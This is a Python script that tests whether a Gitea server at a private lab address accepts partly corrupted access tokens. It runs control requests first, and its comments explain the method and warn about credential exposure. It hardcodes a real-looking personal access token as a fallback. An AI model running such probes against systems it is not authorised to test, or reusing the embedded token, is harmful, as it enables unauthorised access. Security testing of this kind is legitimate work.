gitea_insecure_access_control
import json
import os
import time

import requests
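# Target
host = "192.168.126.129"
port = 3000
base_url = f"http://{host}:{port}"

# Credential under test. The original committed a personal access token in
# clear text; a token that has appeared in a gist or repository must be
# treated as compromised and revoked. Prefer passing it through the
# GITEA_TOKEN environment variable -- the literal is kept only as a fallback
# so existing invocations behave exactly as before.
auth_token = os.environ.get(
    "GITEA_TOKEN", "c3a9402a254ac8d1cd64c9847212a410a85f3735"
)  # valid token

# NOTE(review): the token is sent as the bare header value. Gitea is usually
# addressed as "Authorization: token <value>"; if the bare form is not
# recognised, every request in this script is rejected for the wrong reason
# (401 regardless of the token's content). Confirm a request with the valid
# token is actually authenticated before interpreting the mutated-token probes.
headers = {
    "Accept": "application/json",
    "Authorization": auth_token,
}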
def print_request_response_info(response, request_description):
    """Dump one request/response pair to stdout for manual review.

    Under a ``=== <request_description> ===`` banner this prints the final URL,
    the request headers exactly as sent, the status line, the response headers
    and the raw response body.

    NOTE: the request headers include the Authorization value in clear text, so
    this output contains the (real or mutated) credential used for the request.
    Treat the console output / CI log as sensitive; redact before sharing.

    Args:
        response: a requests.Response (any object exposing ``.url``,
            ``.request.headers``, ``.status_code``, ``.reason``, ``.headers``
            and ``.text`` works).
        request_description: short label used in the banner.
    """
    sent_headers = json.dumps(dict(response.request.headers), indent=2)
    received_headers = json.dumps(dict(response.headers), indent=2)
    report = [
        "",  # blank line before the banner, as in the original output
        f"=== {request_description} ===",
        f"Request URL: {response.url}",
        f"Request Headers: {sent_headers}",
        f"Response Status: {response.status_code} {response.reason}",
        f"Response Headers: {received_headers}",
        f"Response Body: {response.text}",
    ]
    print("\n".join(report))
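def _probe(url, authorization, label, timeout):
    """Send one GET to *url* and dump it with print_request_response_info.

    Args:
        url: absolute URL to request.
        authorization: value for the Authorization header, or None to send the
            request with no Authorization header at all (anonymous control).
        label: banner text for the printed dump.
        timeout: per-request timeout in seconds.

    Returns:
        The requests.Response.
    """
    probe_headers = dict(headers)
    if authorization is None:
        probe_headers.pop("Authorization", None)
    else:
        probe_headers["Authorization"] = authorization
    response = requests.get(url, headers=probe_headers, timeout=timeout)
    print_request_response_info(response, label)
    return response


def test_token_patterns(timeout=10.0):
    """Probe whether partially-corrupted copies of the valid token are accepted.

    Each pattern keeps part of ``auth_token`` and overwrites the rest. A server
    that compares the whole credential must reject every pattern (401/403); a
    2xx for any of them would indicate the token is not validated in full
    (broken access control). Two control requests are sent first, because the
    pattern results are otherwise uninterpretable:

      * anonymous -- if the endpoint answers 2xx with no credential at all, a
        2xx for a mutated token says nothing about token validation;
      * valid token -- if the real token is rejected (e.g. the server expects
        ``Authorization: token <value>`` rather than the bare value this script
        sends), every pattern is rejected for the wrong reason.

    Every request is dumped via print_request_response_info; a 2xx for a
    mutated token is additionally flagged on stdout.

    Args:
        timeout: per-request timeout in seconds. The original issued requests
            with no timeout and could hang forever on an unresponsive host.

    Returns:
        One dict per pattern, ``{"pattern": str, "status": int,
        "accepted": bool}`` where ``accepted`` means a 2xx status. Callers that
        ignored the previous ``None`` return are unaffected.
    """
    url = f"{base_url}/api/v1/settings/repository"

    anon = _probe(url, None, "Control: no Authorization header", timeout)
    valid = _probe(url, auth_token, "Control: valid token", timeout)
    if 200 <= anon.status_code < 300:
        print("WARNING: endpoint answers 2xx without any credential; "
              "2xx results below are NOT evidence of broken access control")
    if not 200 <= valid.status_code < 300:
        print("WARNING: the valid token itself was rejected; verify the "
              "Authorization header format before trusting the results below")

    # A mutated token must actually differ from the real one, otherwise a 2xx
    # is the expected outcome and would be reported as a false positive. The
    # original always appended "0", which is a no-op when the token already
    # ends in "0".
    new_last = "1" if auth_token.endswith("0") else "0"
    patterns_to_test = [
        auth_token[:16] + "a" * 20,   # first 16 chars preserved (36 chars total, kept as in the original)
        "a" * 16 + auth_token[16:],   # everything from index 16 on preserved
        auth_token[:-1] + new_last,   # only the last character changed
        auth_token[0] + "a" * 39,     # only the first character preserved
    ]

    results = []
    for i, pattern in enumerate(patterns_to_test, start=1):
        response = _probe(url, pattern, f"Token Pattern Test #{i}", timeout)
        # 401/403 is the secure outcome; any success status for a corrupted
        # token is the finding this probe exists to detect.
        accepted = 200 <= response.status_code < 300
        if accepted:
            print(f"!!! Pattern #{i} ACCEPTED with HTTP {response.status_code} "
                  "-- a corrupted token was granted access")
        results.append({"pattern": pattern,
                        "status": response.status_code,
                        "accepted": accepted})
    return results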
def main():
    """Run the extended API checks (currently only the token-pattern probe)."""
    print("Starting Extended API Vulnerability Tests...")
    # All per-request output is emitted by print_request_response_info.
    test_token_patterns()
    print("\nExtended testing completed.")


if __name__ == "__main__":
    main()